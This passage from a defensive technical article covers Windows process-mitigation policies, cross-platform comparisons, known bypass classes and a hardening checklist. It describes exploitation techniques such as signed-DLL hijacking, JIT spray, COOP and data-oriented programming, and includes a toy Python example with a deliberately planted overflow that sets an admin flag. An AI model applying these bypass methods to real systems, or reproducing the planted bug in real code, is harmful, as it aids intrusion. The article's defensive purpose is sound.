The pattern that emerges from this matrix is the article's most important practical observation. The matrix is a threat-model artefact.

For any sandboxed-parser design -- a renderer, a font rasterizer, a PDF previewer, an image decoder -- the structurally-correct policy set is the union of what Edge and Recall enable. Both binaries parse untrusted content from the internet or from local files; both run in isolation; neither needs to load third-party signed DLLs, draw windows, or launch child processes. They can enable the full canonical recipe.

For any extensibility-by-design surface, the policy set is smaller and the threat model has to absorb the gap. Outlook cannot enable CIG because the MAPI plugin model and third-party COM add-ins are an existential product feature. Outlook cannot enable ChildProcess because it launches Word to open attachments. Defender cannot enable ACG because the scanner engine generates emulator bytecode, signature-compilation routines, and regex JITs at runtime -- it is, by design, a JIT for AV signatures, and that JIT runs in MsMpEng.exe. Chromium cannot enable CIG by default because of the third-party plugin model (Widevine, native messaging hosts, accessibility integrations).

Key idea: The canonical 2026 hardened-process recipe is CFG plus CET shadow stack plus ACG plus CIG plus Disable-Win32k plus Disable-Extension-Points plus Image-Load (all three flags) plus StrictHandleCheck plus ChildProcess plus, for parsers, FontDisable, plus RedirectionGuard for filesystem-interacting binaries. Every binary that misses one of these does so for a documentable structural reason -- which is exactly the threat-model artefact the matrix above produces.
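
One way to turn the matrix into the threat-model artefact described here is to compute, per binary, which recipe items are not a plain "yes". The sketch below transcribes four columns of the matrix above in abbreviated form; `RECIPE`, `MATRIX`, and `gaps` are hypothetical names, and treating "partial" and "n/a" as gaps is an assumption made for illustration.

```python
RECIPE = [
    "CFG", "CET shadow stack", "ACG", "CIG", "Disable-Win32k",
    "Disable-Extension-Points", "Image-Load", "StrictHandleCheck",
    "ChildProcess",
]

# Cells abbreviated from the matrix, in RECIPE order.
_ROWS = {
    "Edge content": ["yes", "yes", "yes", "yes", "yes",
                     "yes", "yes", "yes", "yes"],
    "Chrome renderer": ["yes", "yes", "yes", "partial", "yes",
                        "yes", "yes", "yes", "yes"],
    "Outlook": ["yes", "partial", "no", "no", "n/a",
                "partial", "partial", "yes", "no"],
    "Defender": ["yes", "yes", "no", "yes", "yes",
                 "yes", "yes", "yes", "yes"],
}
MATRIX = {name: dict(zip(RECIPE, cells)) for name, cells in _ROWS.items()}


def gaps(binary: str) -> list[str]:
    """Recipe items the binary does not fully enable, in recipe order."""
    row = MATRIX[binary]
    return [policy for policy in RECIPE if row[policy] != "yes"]


if __name__ == "__main__":
    for name in MATRIX:
        print(f"{name}: {gaps(name) or 'full recipe'}")
```

Each non-empty result is a list of items that need a documented structural reason, which is the review question the matrix is meant to force.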

This is the recipe the VBS and Trustlets sibling article in this series calls "user-mode hardened." The VBS-isolated Trustlets in the Secure Kernel layer have a separate, complementary surface; see that article for the kernel-side parallel.

Stacking the recipe is the best a 2026 user-mode process can be. But the attacker is still in the room. What survives even a fully-stacked process? What are the bypasses that work after every mitigation is on? Section 12 answers that. First, a quick comparison: what other operating systems do, and what they do differently.

11. What other operating systems do that Windows doesn't

Microsoft is not the only vendor with a per-process mitigation surface. Apple, Linux distributions, Chromium, and ARM-the-vendor are all in the same business, and they have made different structural choices. The honest comparison surfaces where Windows is ahead, where it is behind, and where the gap is not really a gap because the platforms solve slightly different problems.

Apple: Hardened Runtime, ARM PAC, and JIT entitlement. Apple shipped Pointer Authentication Codes (PAC) on the A12 (iPhone XS, September 2018) and on every Mac M1 onward. PAC signs a code pointer with a per-process cryptographic key held in privileged hardware registers, storing the signature in the unused upper bits of a 64-bit pointer. The ARM PACIA, AUTIA, PACIB, and AUTIB instructions sign and verify [@wiki-armv83a]; an unsigned or wrongly-signed pointer dereferenced through a BR/BLR instruction with the AUT variant faults. PAC is structurally stronger than CFG/XFG/CET because the key is held in privileged state and is unforgeable from user mode -- there is no bitmap to lift the validation through.
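
The sign-and-verify idea can be illustrated with a toy model. This is not how the hardware computes a PAC: the sketch substitutes a truncated HMAC-SHA256 for the dedicated hardware cipher, assumes a 48-bit address space with 16 signature bits, and uses hypothetical `sign` and `authenticate` helpers in place of the PACIA/AUTIA instruction pair.

```python
import hashlib
import hmac

ADDR_BITS = 48                       # assumed usable virtual-address width
ADDR_MASK = (1 << ADDR_BITS) - 1


def _mac(key: bytes, pointer: int, context: int) -> int:
    """16-bit stand-in for the pointer authentication code."""
    msg = pointer.to_bytes(8, "little") + context.to_bytes(8, "little")
    digest = hmac.new(key, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:2], "little")


def sign(key: bytes, pointer: int, context: int = 0) -> int:
    """Store the code in the unused upper bits of the pointer."""
    if pointer & ~ADDR_MASK:
        raise ValueError("pointer already has upper bits set")
    return pointer | (_mac(key, pointer, context) << ADDR_BITS)


def authenticate(key: bytes, signed: int, context: int = 0) -> int:
    """Strip and verify the code; fail on any mismatch."""
    pointer = signed & ADDR_MASK
    if signed >> ADDR_BITS != _mac(key, pointer, context):
        raise ValueError("pointer authentication failed")
    return pointer
```

The property the text relies on is visible in the model: without the key, an attacker who overwrites the pointer cannot produce matching upper bits except by guessing.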

Apple's JIT entitlement (com.apple.security.cs.allow-jit) is a stronger architectural answer than ACG [@apple-hardened-runtime]. Code that wants to JIT must declare it at build time and is granted a specific in-process W^X carve-out only if the entitlement is signed into the binary's code signature. The result: JIT capability is an attribute of the signed binary rather than a runtime API call, which closes the race-the-mitigation-window class structurally rather than by API migration (UpdateProcThreadAttribute).

Linux: SELinux, landlock, LLVM -fsanitize=kcfi, LLVM -fsanitize=cfi-icall. Forward-edge CFI in the Linux kernel first arrived in version 5.13 (June 2021) as an LTO-based jump-table implementation; the second-generation -fsanitize=kcfi scheme, which places a 32-bit type hash immediately before each function entry and does not require link-time optimization, replaced it in 6.1 (December 2022) [@lwn-corbet-kcfi]. The kCFI design is conceptually very close to XFG, but cheap enough to deploy on a kernel build because it sheds the LTO requirement. LLVM's user-mode -fsanitize=cfi-icall provides per-prototype CFI via jump-table dispatch but still requires LTO [@clang-cfi-doc]. SELinux operates at a different layer of the stack (mandatory access control on filesystem and IPC resources) and is not directly comparable to a control-flow defense -- it constrains what the process can do rather than what control flows the process can follow.
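
The kCFI idea of a type hash stored immediately before each function entry can be modelled in a few lines. This is an illustrative sketch only: CRC32 stands in for the real type-hash function, prototypes are plain strings, and `CodeImage`, `define`, and `indirect_call` are hypothetical names.

```python
import zlib


class CfiViolation(Exception):
    """Raised where a real kCFI check would trap."""


def type_hash(prototype: str) -> int:
    """Stand-in 32-bit hash of a function prototype (CRC32, not the real one)."""
    return zlib.crc32(prototype.encode("ascii"))


class CodeImage:
    def __init__(self):
        self.hash_before = {}     # entry address -> hash stored just before it
        self.body = {}            # entry address -> callable

    def define(self, addr: int, prototype: str, fn) -> None:
        self.hash_before[addr] = type_hash(prototype)
        self.body[addr] = fn

    def indirect_call(self, addr: int, expected_prototype: str, *args):
        # The call site knows the prototype it expects and compares hashes
        # before transferring control.
        if self.hash_before.get(addr) != type_hash(expected_prototype):
            raise CfiViolation(f"type mismatch at {addr:#x}")
        return self.body[addr](*args)
```

A call through a pointer redirected to a function of a different prototype fails the comparison, while a redirect to a function with the same prototype still passes, which is the residual COOP-style exposure that per-prototype schemes accept.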

Chromium / V8 sandbox. Chrome enables CFG on Windows, leans on ARM PAC on macOS, and is layering the V8 sandbox on top of all of them [@v8-sandbox-blog]. The V8 sandbox is a Chrome-side software defense: it confines a compromised renderer to a specific bounded memory range, so a renderer-process compromise cannot synthesize pointers to arbitrary out-of-sandbox memory. The V8 sandbox sits inside the renderer (different from the OOP-JIT trust boundary above it) and aims to make even a fully-compromised JIT-output bug non-fatal at the system level.

Android: Scudo allocator and ARM Memory Tagging Extension (MTE). MTE attaches a 4-bit tag to every 16-byte allocation [@arm-mte-newsroom]. The CPU enforces the tag on every pointer dereference: tag mismatch raises a synchronous exception. Pixel 8 (October 2023) was the first consumer device with MTE-default-on for the kernel and key system services [@arm-mte-newsroom]. MTE catches the cause (use-after-free, linear overflow into the next allocation) rather than the symptom (control-flow hijack). It is conceptually orthogonal to CFI. The hard part is perf cost on memory-tagged loads, meaningful enough that even Apple has not enabled MTE on iOS as of 2026.
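
A toy model of the tag check, assuming a 4-bit tag per 16-byte granule carried in pointer bits 56 to 59. The `TaggedHeap` class is hypothetical, the caller picks addresses itself (there is no real allocator), and tags are handed out round-robin rather than randomly so the behaviour is deterministic.

```python
GRANULE = 16                      # bytes covered by one tag
TAG_SHIFT = 56                    # tag carried in pointer bits 56..59
ADDR_MASK = (1 << TAG_SHIFT) - 1


class TagCheckFault(Exception):
    """Raised where the CPU would deliver a synchronous tag-check fault."""


class TaggedHeap:
    def __init__(self, size: int):
        self.tags = [0] * (size // GRANULE)
        self._next = 1

    def _fresh_tag(self) -> int:
        tag = self._next
        self._next = self._next % 15 + 1      # cycle through 1..15
        return tag

    def _retag(self, addr: int, size: int) -> int:
        tag = self._fresh_tag()
        for g in range(addr // GRANULE, (addr + size - 1) // GRANULE + 1):
            self.tags[g] = tag
        return tag

    def malloc(self, addr: int, size: int) -> int:
        """Tag the granules and return a pointer carrying the same tag."""
        return (self._retag(addr, size) << TAG_SHIFT) | addr

    def free(self, ptr: int, size: int) -> None:
        """Retag on free so stale pointers no longer match."""
        self._retag(ptr & ADDR_MASK, size)

    def check(self, ptr: int) -> int:
        """Compare pointer tag with memory tag, as every access would."""
        addr = ptr & ADDR_MASK
        if self.tags[addr // GRANULE] != (ptr >> TAG_SHIFT) & 0xF:
            raise TagCheckFault(hex(addr))
        return addr
```

In this model a linear overflow from one allocation into its neighbour and a use-after-free both fault on the first mismatched access, with no control-flow violation required.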

Platform	Forward-edge	Backward-edge	Dynamic code	Memory safety
Windows (x64)	CFG (coarse), XFG (deprecated)	CET shadow stack	ACG	none structural
Apple (ARM64)	PAC (cryptographic, per-process key)	PAC (signs return addresses too)	JIT entitlement (declarative)	none structural
Linux kernel	`-fsanitize=kcfi` (Linux 6.1+)	shadow stack on x86 CET; PAC-RA on ARM	not a kernel issue	Rust-in-kernel pilot
Android	PAC + BTI on supported SoCs	BTI / shadow call stack	sandboxed by selinux + seccomp	MTE on Pixel 8
Chromium	per-platform forward-edge	per-platform backward-edge	OOP JIT + V8 sandbox	layered

The honest accounting:

ARM PAC plus MTE is structurally stronger than CFG plus CET, because the cryptographic key (PAC) and the tag (MTE) are CPU-enforced state that no user-mode primitive can forge.
Apple's JIT entitlement is a stronger architectural answer than ACG because it is declarative at signing time rather than imperative at process startup.
SELinux/landlock is at a different layer (data access control) and is not directly comparable -- it solves a different problem.
Windows's mitigation surface is the most extensively deployed and most frequently extended per-process surface in industry use, by a wide margin. Twenty actual policies is more than any other vendor exposes to applications, and the API is stable, documented, and ABI-compatible across Windows versions back to Windows 8.

MTE catches what CFI cannot. A use-after-free that produces a controllable write -- but never violates the control-flow graph -- is invisible to CFG, XFG, CET, and PAC, but raises an MTE tag-mismatch fault on the very first attacker-controlled dereference. This is the structural reason memory-tagging is the emerging frontier and the structural reason a Windows-on-ARM-with-MTE future would close attack classes the current per-process surface cannot reach.

Stronger primitives exist on competing platforms. But Microsoft's per-process surface is the most extensively-deployed and most-frequently-extended in industry use. The bypasses are what tell us where the surface still leaks.

12. How attackers respond to a fully hardened process

Every generation of Windows mitigation has shipped with a named bypass within a year of its release. Here is the tradition, one named class per defensive generation.

Signed-DLL injection. Predates CIG. Find a Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, an Authenticode-padding write (CVE-2013-3900 family), or a signed driver with a known IOCTL privilege primitive. CIG sees a valid Microsoft signature and lets the DLL load. The mitigation is reactive: Microsoft's App Control / WDAC blocklist and the Driver Block List enumerate hundreds of banned-but-signed binaries; the list grows every quarter; the attacker's job is to find one not yet on it. This is one of the unsolved problems section 14 names.

JIT spray as a CFG bypass (Theori, 2016). The canonical writeup is Theori's Chakra JIT CFG Bypass [@theori-chakra-cfg-bypass]. The page itself states verbatim that the bypass targeted Microsoft Security Bulletin MS16-119 (October 2016) -- a Chakra fix that tightened the JIT's emit pattern. The technique: persuade the Chakra JIT to emit attacker-chosen byte sequences inside JIT-allocated code pages, at addresses the attacker has marked as valid CFG targets via the SetProcessValidCallTargets carve-out. The MS16-119 patch shrank the set of byte sequences a JavaScript program could induce the JIT to emit, but did not eliminate the technique structurally -- the structural fix was ACG (move the JIT out of process), section 8.

JIT spray: An exploitation technique in which an attacker writes JavaScript (or another JIT-targeted language) that causes the runtime JIT compiler to emit a long sequence of executable bytes at predictable addresses, where some of those emitted bytes form a useful gadget chain when reinterpreted at an offset. The classic JIT spray (Dion Blazakis, BHDC 2010) used Adobe Flash's ActionScript JIT. The 2016 Theori work generalised the idea to use the JIT to emit *CFG-valid* function-entry bytes [@theori-chakra-cfg-bypass].

COOP -- code-reuse without a single CFG-invalid call. Discussed in section 5; recapped here as the first bypass class against coarse-grained forward-edge CFI [@coop-ieeesecurity-pdf]. The structural fix is fine-grained CFI: XFG, which Microsoft did not enforce by default and has since deprecated; LLVM's -fsanitize=cfi-icall and -fsanitize=kcfi; ARM PAC. The per-prototype hash check that XFG would have provided is exactly the property that closes COOP.

Race-the-mitigation-window (Forshaw + Fratric, 2017). Discussed in section 8; recapped here. The structural fix is UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY), which installs mitigation policies by the kernel at CreateProcess time, before any user-mode code in the child runs. The race window between CreateProcess return and the child's SetProcessMitigationPolicy call is structurally closed. Documented in the Project Zero issue [@p0-issue-42450607] and the Exploit-DB mirror [@exploit-db-44467].

The CET-bypass research direction (McGarr, 2025). Connor McGarr's Black Hat USA 2025 deck Out of Control names the live research front: kCFG and kCET in the Windows kernel [@mcgarr-bhusa25]. The deck enumerates bypass classes that survive both kernel-mode CFG and kernel-mode CET: page-table modification of the kCFG bitmap (requires kernel write primitives the attacker may already have), abuse of unprotected global function-pointer arrays, structural limits of CET when the attacker is operating with kernel privileges in the first place. The user-mode mitigation surface is mature; the kernel-mode surface is where the live work happens. Hypervisor-Protected Code Integrity (HVCI) is what makes kCFG bitmap mutations harder -- the bitmap is in VTL1, and a VTL0 kernel write cannot touch it -- which is the cross-link to the VBS/Trustlets sibling article in this series.

Cross-context PAC oracles (Apple). Listed for comparative completeness. PAC's per-process key is forgeable if an attacker can call into a function that signs an attacker-controlled pointer with the per-process key and then read the result. This is a known research class on Apple platforms and has produced several CVEs against Safari and iOS over the past five years.

The honest summary is that three classes of bypass survive a fully-stacked user-mode process today:

Signed-but-vulnerable DLL hijack -- defeats CIG by definition (publisher check, not content check).
COOP-style chains where the prototypes match the call site -- defeats CFG (coarse-grained) and is not closed by CET because the call/return invariant holds.
Data-only attacks -- which never violate any control-flow invariant at all, because no control transfer is hijacked.

What is the theoretical limit on what process mitigations can do? That is the next section.

13. What process mitigations cannot do

The Abadi paper that founded CFI in 2005 [@msr-cfi] is also the paper that establishes CFI's structural ceiling. CFI is, by construction, a control-flow property. That is exactly the property a sophisticated attacker can avoid violating.

The formal claim from Abadi, Budiu, Erlingsson, and Ligatti: enforcement of CFI restricts an attacker to control-flow transfers that respect the static call graph. The paper does not say every reachable program behavior is benign. CFI says "the attacker's control flow stays inside the legal CFG." It does not say "the legal CFG is benign." Any attack that operates entirely within the legal CFG is invisible to any CFI variant, including CFG, XFG, CET, PAC, and kCFI.

The lower bound on what an attacker can do while staying inside the legal CFG is given by data-oriented programming. The canonical paper is Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks by Hong Hu, Shweta Shinde, Sendroiu Adrian, Zheng Leong Chua, Prateek Saxena, and Zhenkai Liang, all of the National University of Singapore Department of Computer Science [@dop-paper]. The abstract is constructive and devastating: "such attacks are Turing-complete. We present a systematic technique called data-oriented programming (DOP) to construct expressive non-control data exploits."

Data-oriented programming (DOP): An exploitation technique in which the attacker corrupts non-control data -- authentication flags, length fields, function-table indices, loop bounds -- and lets the program's own legitimate, unmodified control flow execute the attacker's intended computation. Hu, Shinde, Adrian, Chua, Saxena, and Liang proved DOP is Turing-complete: any computation can be expressed as a chain of data-only corruptions in a sufficiently-large program [@dop-paper]. No CFI variant -- CFG, XFG, CET shadow stack, ARM PAC, kCFI -- can detect a DOP attack, because no control flow is hijacked.

The mechanism: the attacker corrupts a current_user.is_admin flag rather than redirecting a function pointer. They corrupt a buffer_len field to enable a subsequent legitimate write past the allocation's intended end. They corrupt a next_state index to drive a state machine through an attacker-chosen path. The program's own logic, executing every instruction the compiler emitted and following every control transfer the static call graph allows, performs the attack. DOP is, in a precise sense, the program working as designed -- on data the attacker has chosen.
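
The first of those corruptions can be shown in miniature. The sketch below is a deliberately buggy toy, not code from any real product: `Session` is a hypothetical object whose flat byte buffer places an `is_admin` byte directly after an 8-byte name field, and `set_name` omits the bounds check.

```python
class Session:
    NAME_LEN = 8
    ADMIN_OFF = 8              # is_admin byte sits right after the name buffer

    def __init__(self):
        self.mem = bytearray(16)

    def set_name(self, data: bytes) -> None:
        # The bug: copies every byte of data, never checking NAME_LEN.
        for i, b in enumerate(data):
            self.mem[i] = b

    def is_admin(self) -> bool:
        return self.mem[self.ADMIN_OFF] != 0

    def open_panel(self) -> str:
        # Legitimate, unmodified control flow: one branch on a data flag.
        return "admin panel" if self.is_admin() else "access denied"


if __name__ == "__main__":
    s = Session()
    s.set_name(b"alice")
    print(s.open_panel())
    s.set_name(b"A" * 8 + b"\x01")     # ninth byte lands on is_admin
    print(s.open_panel())
```

No function pointer or return address is touched: `open_panel` takes a branch the static call graph already allows, so a forward-edge or backward-edge check has nothing to object to.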

A second structural limit: process mitigations are per-process. The kernel has a parallel mitigation surface (kCFG, kCET, HVCI, Secure Kernel, the VBS/Trustlets stack) the per-process policies do not touch [@mcgarr-bhusa25]. The user-mode hardening recipe stops at the syscall boundary. Everything beyond is the kernel's job. A renderer that is fully hardened can still be the entry point for a kernel privilege escalation if a syscall takes attacker-controlled input and the kernel-side code path has its own bug.

The third structural limit is the most uncomfortable to state.

Key idea: Process mitigations harden the exploit chain. They do not fix the bug. The C/C++ memory-safety bug is still there; mitigations just constrain what the attacker can do with it.

Matt Miller, then a senior security engineer at the Microsoft Security Response Center, said this in his BlueHat IL 2019 talk. The deck is on GitHub at the Microsoft MSRC Security Research repository, with the load-bearing slide preserved verbatim [@miller-bhil-pdf]:

~70% of the vulnerabilities addressed through a security update each year continue to be memory safety issues. -- Matt Miller, BlueHat IL 2019 [@miller-bhil-pdf]

ZDNet's contemporaneous coverage extended the claim: "around 70 percent of all the vulnerabilities in Microsoft products addressed through a security update each year are memory safety issues; a Microsoft engineer revealed last week at a security conference; over the last 12 years, around 70 percent of all Microsoft patches were fixes for memory safety bugs" [@zdnet-70percent].

Seventy percent. For a decade. The mitigations in this article -- CFG, XFG, CET, ACG, CIG, every smaller policy in the enum -- exist precisely because that number was not going down. Each generation raises the cost of weaponizing a memory-safety bug into a working exploit. None of them reduces the rate at which memory-safety bugs are introduced into the codebase in the first place.

For the kernel-mode side -- kCFG, kCET, HVCI, and the Trustlets that execute in the Virtual Trust Level 1 (VTL1) Secure Kernel layer -- see the *VBS and Trustlets* sibling article in this series. The user-mode and kernel-mode mitigation surfaces are designed to compose: a renderer hardened to the canonical recipe in section 10, syscalling into a kernel hardened with kCFG and kCET, and protected by an HVCI hypervisor, is the layered defense Microsoft's strategic direction since 2014 has been building toward.

The only ceiling-breaker is to replace the language (so the bug never exists) or to replace the memory model (so the bug cannot be turned into a primitive). The two long-term answers are memory-safe systems languages, principally Rust (Microsoft has been publicly committing to Rust in Windows since 2019 [@msrc-rust-2019]), and hardware memory-safety platforms such as CHERI (capabilities) and ARM MTE (memory tagging), which catch the bug at the dereference rather than somewhere down the exploit chain.

Three things have to be true for mitigations to keep buying time:

Each new mitigation closes a specific attack class -- which means a specific bypass class becomes the next research front.
Each new bypass class must take an attacker longer to develop than it takes Microsoft to ship the next mitigation -- otherwise the curve goes the wrong way.
The fraction of memory-safety bugs in shipped code has to either stop rising or start falling -- otherwise no number of mitigations stacks fast enough.

Mitigations are a delaying action. The long-term answer is somewhere else. The reader's belief at this point is no longer "stack enough mitigations and we win." It is "mitigations have a structural ceiling, and the bug is still there." If process mitigations have a ceiling, what is Microsoft pivoting toward, and what is the open frontier?

14. Open problems

Six things are still unsolved -- or, more precisely, six things are partially solved in ways that are documented but visibly imperfect.

1. Forward-edge CFI without recompilation. Binary-rewriting CFI (BinCFI, Mocfi, Lockdown) is not production-grade on Windows. Microsoft's strategic answer is "recompile first-party code with /guard:cf and accept that legacy third-party binaries remain unguarded." That answer is a long-tail problem: the surface of legacy third-party DLLs that load into hardened Windows processes (drivers, COM components, accessibility tools) is large, slow to recompile, and outside Microsoft's direct control.

2. Backward-edge protection on pre-CET hardware. Microsoft's pre-CET internal experiment was Return Flow Guard (RFG), a software-implemented per-thread shadow stack maintained by the runtime rather than the CPU. Tencent Xuanwu Lab bypasses came faster than Microsoft could harden RFG [@wiki-cfi]; Microsoft pivoted to wait for Intel CET. Pre-Tiger-Lake (pre-September-2020) Intel hardware and pre-Zen-3 (pre-November-2020) AMD hardware remain unprotected on the backward edge. Enterprises that need backward-edge protection on older hardware have to sandbox in VBS-isolated VMs; see the VBS and Trustlets sibling article.

3. The JIT-engine compatibility tax under ACG. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip. For short-lived JavaScript (lots of small functions, one-shot pages, ad-network microservices), this is significant. Chrome's V8 sandbox project (active since 2023) confines the JIT process to a sandboxed memory range of the renderer's address space, which closes the IPC-level attack class but does not erase the perf cost [@v8-sandbox-blog]. Interpreter-only renderers for low-trust contexts (small pages, ad iframes) are the medium-term direction; the cost is the runtime perf gap to fully-jitted JS.

4. ACG plus AV interoperability. Defender's MsMpEng.exe cannot enable ACG. The scanner engine generates code at runtime: signature compilation routines, emulator bytecode, regex JITs. Migration to interpreted bytecode is partial. This is a permanent compatibility tension between W^X-as-process-invariant and runtime-generated-code-as-a-feature, and it shows up in every AV engine across every vendor (CrowdStrike Falcon, SentinelOne, Symantec), not just Defender.

5. Signed-but-vulnerable Microsoft DLLs as universal CIG-bypass loaders. The Microsoft-signed DLL surface is enormous and historically full of side-effect DLLs. The App Control / WDAC blocklist is reactive. The blocklist publishes quarterly. New signed-but-vulnerable DLLs are found every quarter. This is a permanent residual risk against CIG and the structural reason vendors with sensitive workloads sometimes run with MitigationOptIn plus a per-process allowlist rather than MicrosoftSignedOnly plus an unbounded universe.

6. XFG default-on tradeoffs. XFG's instrumentation is in the MSVC binaries; the dispatch thunks are in ntdll.dll. Enforcement-by-default never shipped. McGarr's BHUSA 2025 deck names XFG as "deprecated" [@mcgarr-bhusa25]; Microsoft's strategic direction is hardware-backed CFI (CET shadow stack for the backward edge) plus kCFG / kCET in the kernel. The unsolved question is whether the forward edge can ever get fine-grained protection without the compatibility cost that killed XFG. Apple's PAC suggests yes (because the cryptographic key approach has zero compatibility cost on cast); LLVM's -fsanitize=cfi-icall suggests yes for code built end-to-end with LTO. Neither has a Windows analog as of 2026.

Recompile first-party code with `/guard:cf /CETCOMPAT`. Push the kernel hardening (kCFG, kCET, HVCI) forward, since the user-mode surface is mature. Lean on hardware (Intel CET, AMD shadow stack, eventually MTE-on-Windows-on-ARM) rather than software heuristics. Accept that legacy unrecompiled binaries remain unguarded and quarantine them in lower-trust VBS-isolated contexts. That is the strategy McGarr's 2025 deck implies and that the Defender / Edge / Recall configurations in the section 10 matrix execute [@mcgarr-bhusa25].

Six open problems. The first four are engineering. The last two are structural. The structural ones suggest the next-decade answer is not a better mitigation, but a different memory model: Rust, CHERI, MTE.

15. Practical guide: ten steps to ship a hardened binary

Concrete. Ten steps. By the end of this checklist, your new sandboxed-parser binary is hardened to the canonical 2026 recipe.

1. Run dumpbin /headers /loadconfig YourBinary.exe. Verify the Guard Flags word is non-zero, that FID Table present is in the output, and that the Guard CF Function Table is non-empty [@ms-cfg-doc].
2. Compile and link with: /guard:cf /guard:cfw /CETCOMPAT /DYNAMICBASE /HIGHENTROPYVA /NXCOMPAT. The /CETCOMPAT flag requires Visual Studio 2019 or later and x64 only [@ms-guard-cf-compiler, @ms-guard-cf-linker, @ms-cetcompat].
3. Call SetProcessMitigationPolicy (or, better, UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) for child processes) for: ProcessDynamicCodePolicy, ProcessExtensionPointDisablePolicy, ProcessImageLoadPolicy (with NoRemoteImages plus NoLowMandatoryLabelImages plus PreferSystem32Images), ProcessStrictHandleCheckPolicy, ProcessSystemCallDisablePolicy (if your process does not draw windows), and ProcessUserShadowStackPolicy (with EnableUserShadowStack and, for the most-hardened sandboxes, BlockNonCetBinaries) [@ms-setprocessmitigationpolicy, @ms-dynamic-code-policy, @ms-image-load-policy, @ms-user-shadow-stack-policy].
4. Use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) rather than post-CreateProcess policy installation for any child process. This is the single most important step on this list.
5. Audit with Set-ProcessMitigation -PolicyFilePath (Group Policy / Intune deployable XML). The schema and the cmdlet are documented in the Defender Exploit Protection reference [@ms-defender-exploit-protection].
6. For sandboxed parsers (PDF, image, video, font), enable ProcessFontDisablePolicy. Refuse non-system fonts at the per-process layer.
7. For signed-component-only processes, enable ProcessSignaturePolicy(MicrosoftSignedOnly). Accept that some third-party DLLs will not load and document each gap in your threat model [@ms-binary-signature-policy].
8. For browser-class sandboxed children, prohibit child-process creation with ProcessChildProcessPolicy. Closes the renderer-to-cmd.exe pivot class.
9. Validate the rendered policy at runtime with Get-ProcessMitigation -Name <binary>. Spot-check that every flag you set in code is reflected in the cmdlet output [@ms-defender-exploit-protection].
10. For each policy you cannot enable, document the structural reason in your threat model. A binary that misses CIG because it depends on third-party COM add-ins is making a deliberate threat-model choice; that choice must be visible to the security review.

Note: UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) closes the race-the-mitigation-window class structurally (section 8, section 12). Every other step on this list is a useful addition. Step 4 is the load-bearing step that lets every other step work as designed. Without it, a peer process in the same security context can disable any of the others between CreateProcess and the child's first attempt to install its policies.

The composition of the policy bitfield itself is mechanical. For SetProcessMitigationPolicy, each policy is a small DWORD-sized structure; the mitigation-policy attribute for UpdateProcThreadAttribute instead packs the relevant flags into a 64-bit value, optionally followed by a second 64-bit value that carries the newer PROCESS_CREATION_MITIGATION_POLICY2_* flags.

Run this in an elevated PowerShell session, replacing `msedge.exe` with the basename of your binary:

Get-ProcessMitigation -Name msedge.exe |
  Format-List CFG, CETShadowStack, BinarySignature, DynamicCode,
              ExtensionPoint, ImageLoad, StrictHandle, SystemCall,
              ChildProcess, FontDisable, PayloadRestriction,
              SideChannelIsolation, ASLR, DEP

Each block in the output shows Enable, Audit, and the subordinate flag word with its individual boolean fields. Spot-check that every flag your code sets in SetProcessMitigationPolicy is reflected as ON in the cmdlet output, and that any OFF or NOTSET cell has a documented structural reason in your threat model [@ms-defender-exploit-protection].

{`
// Each name is documented in the PROCESS_CREATION_MITIGATION_POLICY_* constants
// in winnt.h. After the three legacy single-bit flags, every ALWAYS_ON flag is
// the low bit of a 2-bit field, and the fields sit 4 bits apart from bit 8.
const POL = {
  // Low DWORD (bits 0-31)
  'DEP_ENABLE': 0x01n << 0n,
  'DEP_ATL_THUNK_ENABLE': 0x01n << 1n,
  'SEHOP_ENABLE': 0x01n << 2n,
  'FORCE_RELOCATE_IMAGES_ALWAYS_ON': 0x01n << 8n,
  'HEAP_TERMINATE_ALWAYS_ON': 0x01n << 12n,
  'BOTTOM_UP_ASLR_ALWAYS_ON': 0x01n << 16n,
  'HIGH_ENTROPY_ASLR_ALWAYS_ON': 0x01n << 20n,
  'STRICT_HANDLE_CHECKS_ALWAYS_ON': 0x01n << 24n,
  'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON': 0x01n << 28n,
  // High DWORD (bits 32-63)
  'EXTENSION_POINT_DISABLE_ALWAYS_ON': 0x01n << 32n,
  'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON': 0x01n << 36n,
  'CONTROL_FLOW_GUARD_ALWAYS_ON': 0x01n << 40n,
  'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON': 0x01n << 44n,
  'FONT_DISABLE_ALWAYS_ON': 0x01n << 48n,
  'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON': 0x01n << 52n,
};

// Compose the recipe for a sandboxed PDF parser
const enabled = [
  'DEP_ENABLE',
  'BOTTOM_UP_ASLR_ALWAYS_ON',
  'HIGH_ENTROPY_ASLR_ALWAYS_ON',
  'STRICT_HANDLE_CHECKS_ALWAYS_ON',
  'WIN32K_SYSTEM_CALL_DISABLE_ALWAYS_ON',
  'EXTENSION_POINT_DISABLE_ALWAYS_ON',
  'PROHIBIT_DYNAMIC_CODE_ALWAYS_ON',
  'CONTROL_FLOW_GUARD_ALWAYS_ON',
  'BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON',
  'FONT_DISABLE_ALWAYS_ON',
  'IMAGE_LOAD_NO_REMOTE_ALWAYS_ON',
];

// OR the selected flags into one 64-bit value and print it as 16 hex digits
let options = 0n;
for (const name of enabled) options |= POL[name];
console.log('MitigationOptions = 0x' + options.toString(16).padStart(16, '0'));
console.log('Policies enabled: ' + enabled.length + ' of ' + Object.keys(POL).length);
`}
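Going the other way, from a 64-bit value back to per-policy states, is useful when reviewing a value captured from a debugger or a log. The sketch below assumes the winnt.h layout in which each of these policies occupies a 2-bit field (0 defers to the system default, 1 is ALWAYS_ON, 2 is ALWAYS_OFF). The helper name, the state labels, and the sample value are made up for illustration, and the offsets should be checked against the SDK headers you build with.

```javascript
// Decode a 64-bit process-creation mitigation value into per-policy states.
// Assumption: each policy below is a 2-bit field at the listed bit offset.
// The single-bit legacy flags (DEP, DEP ATL thunk, SEHOP) are left out.
const FIELD_OFFSETS = {
  FORCE_RELOCATE_IMAGES: 8n,
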